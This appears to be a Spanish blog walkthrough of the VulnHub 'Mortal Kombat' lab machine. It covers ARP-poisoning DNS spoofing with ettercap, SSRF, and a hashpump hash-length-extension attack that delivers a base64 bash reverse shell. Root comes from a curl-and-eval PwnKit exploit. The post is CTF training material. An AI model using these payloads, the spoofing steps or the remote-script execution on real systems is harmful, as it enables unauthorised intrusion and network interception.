vulnhub walkthrough MORTAL KOMBAT: 1: ARP poison routing + dns spoofing, ssrf hash-length attack

 https://www.vulnhub.com/entry/mortal-kombat-1,383/

You'll need to master and chain together multiple vulnerabilities

1. Se nos presenta lo siguiente

Curl test page

admin area (works only if localhost)
test page


testpage:

http://192.168.2.24/index.php?url=http://google.com

Probamos lfi

http://192.168.2.24/index.php?url=http://127.0.0.1/adminArea.php

you can only render page from google.com domain


2. Tenemos que spoofear la petición dns de la máquina virtual haciéndole creer que "google.com" es 127.0.0.1 para poder acceder a adminArea.php. 


en kali usar ettercap

- configurar etc/ettercap/etter.dns

google.com A 127.0.0.1

- Arrancar y hacer mitm arp poisoning seleccionando target1 la víctima y target2 el router

- Activar dns spoofing


3. Accedemos a adminArea.php con Burp

<!--
After the PT @Bytevsbyt3 told me that my page was really unsecure. He told me
that he pwn the server via RFI with ?file=http://evil.com/rfi.txt
I read about this vulnerability and now i fixed it. Now it's secure and I'm
pretty proud of myself and my code:).
I leave the fixed code in the source, in such way you can read about a good fix from here ;)
Before(vuln code!!!):
if(isset($_GET['file']) {
  $file = $_GET['file'];
  include($file);
  .
  .
  .
  .
Now(fixed code):
if(isset($_GET['file']) && isset($_GET['hash'])) {
  $file = $_GET['file'];
  if (sha1($secret.$file) === $_GET['hash']) {//preventing filename tampering
    $file = basename($file);//eliminate path travrsal and other shitty attack :D
    include($file);
  }
  .
  .
  .
  -->
</body>
<h2>Read file page</h2>
 in pure <b>php</b>
  <form id="myForm" >
    <input type="text" name="file" value="robots.txt">
    <input name="hash" value="e41b733f1d0c914cd72681ce93ea20c4ce6b6fed">
    <input type="submit">
  </form>
</html>

- Vemos el contenido y se trata de un hash length extension attack. Usamos hashpump. Se trataría de probar incrementando la longitud del secret hasta que funcione. Finalmente es 42.


~/vuln/mortalkombat/hash_extender$ hashpump
Input Signature: e41b733f1d0c914cd72681ce93ea20c4ce6b6fed
Input Data: robots.txt
Input Key Length: 42
Input Data to Add: /data:;base64,PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yLjg0LzEyMzQgMD4mMSciKTsgPz4=
19d7d8f548b3986d59c1510a8a8a31a31cbbdb6a
robots.txt\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xa0/data:;base64,PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yLjg0LzEyMzQgMD4mMSciKTsgPz4=

Como payload se envía un shell reverse

En Burp:

GET /index.php?url=http%3a//google.com/adminArea.php%3ffile%3drobots.txt%2580%2500%2500%2500%2500%2500%2500%2500%2500%2500%2501%25a0/data%253a%253bbase64,PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yLjg0LzEyMzQgMD4mMSciKTsgPz4=%26hash%3d19d7d8f548b3986d59c1510a8a8a31a31cbbdb6a HTTP/1.1

- Accedemos. Para rootear hay que hacer overflow en opt agenda. Pero también es vulnerable a polkit.

eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"

Comentarios

Publicar un comentario

Entradas populares de este blog

Actualizando a LEDE (Openwrt based) el router Afoundry EW-1200

Imagen
Tenemos aquí un router "chino" que en principio llama la atención por las 6 antenas que trae. Por el precio sería un router de gama media-alta. Aquí viene una review. Me quedo con la aparente potencia del procesador  Mediatek  MT7621   de 2 núcleos a 880 Mhz y la capacidad de emitir wifi simultáneamente en las bandas de 2.4 y 5 Ghz. Incorpora además -  128 MB  DDR3 RAM - 128 Mb SPI flash - 1 USB 3.0 Funciona bastante bien, pero la interfaz web es demasiado austera y deja muchos parámetros ocultos que lo harían más potente. En concreto trae instalado el Openwrt Barrier Breaker 14.07 pero modificado. Para manipularlo abrimos la carcasa y conectamos por el puerto serial que trae, en este caso de solo 3 pines Rx,Gnd,Tx. No trae JTAG. Para conectar usamos de nuevo un cable prolific  Plugable USB to RS-232 DB9  y un  Serial Port Converter  JY-R2T V1.2 RS232. Al ser una conexión de solo tres pines sin VCC (alimentació...
Leer más

SIXES: 1: Walkthrough Advanced-Hard Boot2Root machine: Cookie stealing + jpg shell + pwn BOF ret2lib NX ASLR

Imagen
  https://www.vulnhub.com/entry/sixes-1,380/ Advanced-Hard Boot2Root machine intended to be used in a Workshop/CTF beside Shellmates Club. Este es el primer walkthrough de esta máquina en internet. Tiene una serie de movimientos con los que se puede aprender mucho ;) 1.  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 09:50 CET Nmap scan report for sixes.home (192.168.2.28) Host is up (0.016s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT     STATE SERVICE 21/tcp   open  ftp 22/tcp   open  ssh 80/tcp   open  http Accedemos al ftp lftp 192.168.2.28:~> dir -r--r--r--    1 0        0             233 Oct 03  2019 note.txt lftp 192.168.2.28:/> cat note.txt DONE:   - Develop the web application frontend and backend   - Add a firewall to block malicious tools TODO:   - Hire a Pentester to secure the web applicati...
Leer más